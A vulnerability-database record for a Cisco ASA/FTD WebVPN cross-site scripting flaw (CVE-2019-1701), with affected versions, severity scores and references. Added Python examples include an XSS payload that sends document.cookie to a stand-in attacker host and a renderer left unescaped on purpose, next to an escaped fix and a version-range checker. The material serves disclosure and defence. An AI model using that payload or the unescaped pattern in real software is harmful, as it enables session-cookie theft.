ID

VAR-201905-0583


CVE

CVE-2019-1701


TITLE

Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2019-003888

DESCRIPTION

Multiple vulnerabilities in the WebVPN service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the WebVPN portal of an affected device. The vulnerabilities exist because the software insufficiently validates user-supplied input on an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information. An attacker would need administrator privileges on the device to exploit these vulnerabilities.

Multiple Cisco products are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug IDs CSCvn78674, CSCvo11406, CSCvo11416 and CSCvo17033.

The vulnerabilities stem from the web application's failure to correctly validate client-supplied data.
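The defect class described above (CWE-79: user-controlled input from a crafted link is copied into the portal's HTML without validation or encoding) and its standard fix, shown as an added illustrative example. This is not Cisco's WebVPN code and no real WebVPN endpoint or parameter is reproduced: the host, the path and the query parameter "msg" are hypothetical placeholders, and the crafted link is constructed for the demonstration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed crafted link of the kind the advisory describes: the victim is
# persuaded to open it and the query string carries script. Host, path and
# the parameter name "msg" are hypothetical, not real WebVPN identifiers.
CRAFTED_LINK = (
    "https://vpn.example.test/portal?msg="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example.test"
    "%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def param_from_link(link: str, name: str) -> str:
    """Return one query parameter as the server would see it (URL-decoded)."""
    return parse_qs(urlsplit(link).query).get(name, [""])[0]


def render_vulnerable(value: str) -> str:
    """CWE-79 pattern: the attacker-controlled value is placed straight into
    the HTML body, so any markup in it becomes part of the page."""
    return f"<html><body><p>{value}</p></body></html>"


def render_hardened(value: str) -> str:
    """Fix: encode for the HTML text context before insertion. The browser
    now receives literal text, not elements, so no script runs."""
    return f"<html><body><p>{html.escape(value, quote=True)}</p></body></html>"


class _TagCollector(HTMLParser):
    """Records the start tags the HTML parser actually creates."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def tags_in(doc: str) -> list:
    """Tag names a browser-style parser would build from the document; a
    'script' entry means the payload was interpreted as code."""
    collector = _TagCollector()
    collector.feed(doc)
    return collector.tags


if __name__ == "__main__":
    payload = param_from_link(CRAFTED_LINK, "msg")
    print("vulnerable render creates tags:", tags_in(render_vulnerable(payload)))
    print("hardened render creates tags:  ", tags_in(render_hardened(payload)))
```

The check uses a real HTML parser rather than a substring match, because the question is what elements a browser will construct, not whether the characters "<script" appear somewhere. The same encoding discipline must be applied per output context (attribute, URL, JavaScript string); `html.escape` is only correct for the element-body context shown here.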

Trust: 1.98

sources: NVD: CVE-2019-1701 // JVNDB: JVNDB-2019-003888 // BID: 108152 // VULHUB: VHN-149213

AFFECTED PRODUCTS

vendor: cisco | model: adaptive security appliance software | scope: gte | version: 9.5

Trust: 1.0

vendor: cisco | model: firepower threat defense | scope: lt | version: 6.3.0.3

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: lt | version: 9.9.2.50

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: lt | version: 9.10.1.17

Trust: 1.0

vendor: cisco | model: firepower threat defense | scope: gte | version: 6.2.1

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: lt | version: 9.8.4

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: lt | version: 9.6.4.25

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: lt | version: 9.4.4.34

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: gte | version: 9.10

Trust: 1.0

vendor: cisco | model: firepower threat defense | scope: gte | version: 6.3.0

Trust: 1.0

vendor: cisco | model: firepower threat defense | scope: lt | version: 6.2.3.12

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: gte | version: 9.7

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: gte | version: 9.9

Trust: 1.0

vendor: cisco | model: adaptive security appliance software | scope: - | version: -

Trust: 0.8

vendor: cisco | model: firepower threat defense software | scope: - | version: -

Trust: 0.8

vendor: cisco | model: firepower threat defense virtual | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: firepower security appliance 9300 | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: firepower series 4100 | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: firepower series 2100 | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: asa services module for cisco catalyst series switches 6500 | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: asa services module for cisco series routers 7600 | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: asa adaptive security appliance 5505 | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: asa series firewalls 5500-x | scope: eq | version: 9.9(2)

Trust: 0.3

vendor: cisco | model: asa series firewalls 5500-x | scope: eq | version: 9.8(1)

Trust: 0.3

vendor: cisco | model: asa series firewalls 5500-x | scope: eq | version: 9.6(2)

Trust: 0.3

vendor: cisco | model: asa series firewalls 5500-x | scope: eq | version: 9.4(4)

Trust: 0.3

vendor: cisco | model: asa series firewalls 5500-x | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: asa cloud firewall 1000v | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: adaptive security virtual appliance | scope: eq | version: 0

Trust: 0.3

vendor: cisco | model: series industrial security appliances 3000 | scope: eq | version: 0

Trust: 0.3

sources: BID: 108152 // JVNDB: JVNDB-2019-003888 // NVD: CVE-2019-1701
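The NVD entries above give the vulnerable ranges as separate "gte" and "lt" rows, and the ASA CLI prints releases as 9.9(2) rather than 9.9.2, so deciding whether a given device is in scope takes a little care. The following is an added helper, not part of this record or of any Cisco tool, that normalises both version spellings and tests them against the ranges transcribed from the table. Pairing each lower bound with the upper bound of the same release train (9.5 with 9.6.4.25, 9.7 with 9.8.4, and so on) is this example's reading of the NVD rows, so confirm it against the Cisco advisory linked under PATCH; the "show version" banner line is a constructed sample.

```python
import re
from typing import Optional, Tuple

# Vulnerable ranges transcribed from the AFFECTED PRODUCTS rows above (NVD
# data). Pairing each "gte" lower bound with the "lt" upper bound of the same
# release train is an assumption made here; verify against the Cisco advisory.
RANGES = {
    "asa": [
        (None, "9.4.4.34"),
        ("9.5", "9.6.4.25"),
        ("9.7", "9.8.4"),
        ("9.9", "9.9.2.50"),
        ("9.10", "9.10.1.17"),
    ],
    "ftd": [
        ("6.2.1", "6.2.3.12"),
        ("6.3.0", "6.3.0.3"),
    ],
}

# Constructed sample of the banner line that "show version" prints on ASA;
# the rest of that command's output is not reproduced here.
SAMPLE_SHOW_VERSION = """\
Cisco Adaptive Security Appliance Software Version 9.9(2)
Firepower Extensible Operating System Version 2.3(1.84)
"""


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '9.9.2.50', '9.9(2)50' or '9.9(2)' into a comparable integer tuple.
    The parenthesised form is how the ASA CLI prints release numbers. Pass a
    bare version string, not a whole banner, or unrelated digits get picked up."""
    nums = tuple(int(n) for n in re.findall(r"\d+", text))
    if not nums:
        raise ValueError(f"no version number in {text!r}")
    return nums


def _pad(v: Tuple[int, ...], width: int) -> Tuple[int, ...]:
    # 9.8.4 and 9.8.4.0 denote the same release, so pad with zeros.
    return v + (0,) * (width - len(v))


def _lt(a: Tuple[int, ...], b: Tuple[int, ...]) -> bool:
    width = max(len(a), len(b))
    return _pad(a, width) < _pad(b, width)


def affected_range(product: str, version: str) -> Optional[str]:
    """Return a label for the vulnerable range containing `version`, or None
    when the release sits outside every range (fixed, or not listed)."""
    v = parse_version(version)
    for low, high in RANGES[product]:
        below_low = low is not None and _lt(v, parse_version(low))
        reached_fix = not _lt(v, parse_version(high))
        if not below_low and not reached_fix:
            return f"{low or '*'} <= v < {high}"
    return None


def version_from_show_version(output: str) -> Optional[str]:
    """Pull the ASA release string out of 'show version' text."""
    m = re.search(r"Adaptive Security Appliance Software Version (\S+)", output)
    return m.group(1) if m else None


if __name__ == "__main__":
    running = version_from_show_version(SAMPLE_SHOW_VERSION)
    print(f"ASA {running}: affected range = {affected_range('asa', running)}")
```

The range test deliberately treats the upper bound as exclusive and the lower bound as inclusive, matching the "gte" / "lt" scopes in the rows above; a device on exactly the first fixed release (for example 9.9.2.50 or 6.2.3.12) reports no affected range.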

CVSS

SEVERITY

nvd@nist.gov: CVE-2019-1701
value: MEDIUM

Trust: 1.0

ykramarz@cisco.com: CVE-2019-1701
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-1701
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201905-031
value: MEDIUM

Trust: 0.6

VULHUB: VHN-149213
value: LOW

Trust: 0.1

CVSSV2

nvd@nist.gov: CVE-2019-1701
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-149213
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

CVSSV3

nvd@nist.gov: CVE-2019-1701
baseSeverity: MEDIUM
baseScore: 4.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 1.7
impactScore: 2.7
version: 3.0

Trust: 2.8

sources: VULHUB: VHN-149213 // JVNDB: JVNDB-2019-003888 // CNNVD: CNNVD-201905-031 // NVD: CVE-2019-1701

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-149213 // JVNDB: JVNDB-2019-003888 // NVD: CVE-2019-1701

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201905-031

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201905-031

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-003888

PATCH

title: cisco-sa-20190501-asa-ftd-xss | url: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-asa-ftd-xss

Trust: 0.8

title: Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software fixes for cross-site scripting vulnerabilities | url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92182

Trust: 0.6

sources: JVNDB: JVNDB-2019-003888 // CNNVD: CNNVD-201905-031

EXTERNAL IDS

db: NVD | id: CVE-2019-1701

Trust: 2.8

db: BID | id: 108152

Trust: 2.0

db: JVNDB | id: JVNDB-2019-003888

Trust: 0.8

db: CNNVD | id: CNNVD-201905-031

Trust: 0.7

db: AUSCERT | id: ESB-2019.1510.2

Trust: 0.6

db: VULHUB | id: VHN-149213

Trust: 0.1

sources: VULHUB: VHN-149213 // BID: 108152 // JVNDB: JVNDB-2019-003888 // CNNVD: CNNVD-201905-031 // NVD: CVE-2019-1701

REFERENCES

url:http://www.securityfocus.com/bid/108152

Trust: 2.3

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190501-asa-ftd-xss

Trust: 2.0

url:https://nvd.nist.gov/vuln/detail/cve-2019-1701

Trust: 1.4

url:http://www.cisco.com/

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1701

Trust: 0.8

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190501-asa-ftd-ike-dos

Trust: 0.6

url:https://www.auscert.org.au/bulletins/80090

Trust: 0.6

url:https://vigilance.fr/vulnerability/cisco-asa-cross-site-scripting-via-webvpn-29197

Trust: 0.6

sources: VULHUB: VHN-149213 // BID: 108152 // JVNDB: JVNDB-2019-003888 // CNNVD: CNNVD-201905-031 // NVD: CVE-2019-1701

CREDITS

Qian Chen of Qihoo 360 Information Security Department reported one of these vulnerabilities. The other vulnerabilities in this advisory were found during internal security testing.

Trust: 0.6

sources: CNNVD: CNNVD-201905-031

SOURCES

db: VULHUB | id: VHN-149213
db: BID | id: 108152
db: JVNDB | id: JVNDB-2019-003888
db: CNNVD | id: CNNVD-201905-031
db: NVD | id: CVE-2019-1701

LAST UPDATE DATE

2024-08-14T13:45:03.618000+00:00


SOURCES UPDATE DATE

db: VULHUB | id: VHN-149213 | date: 2019-10-09T00:00:00
db: BID | id: 108152 | date: 2019-05-01T00:00:00
db: JVNDB | id: JVNDB-2019-003888 | date: 2019-05-23T00:00:00
db: CNNVD | id: CNNVD-201905-031 | date: 2019-05-08T00:00:00
db: NVD | id: CVE-2019-1701 | date: 2023-08-15T15:24:56.340

SOURCES RELEASE DATE

db: VULHUB | id: VHN-149213 | date: 2019-05-03T00:00:00
db: BID | id: 108152 | date: 2019-05-01T00:00:00
db: JVNDB | id: JVNDB-2019-003888 | date: 2019-05-23T00:00:00
db: CNNVD | id: CNNVD-201905-031 | date: 2019-05-01T00:00:00
db: NVD | id: CVE-2019-1701 | date: 2019-05-03T16:29:00.367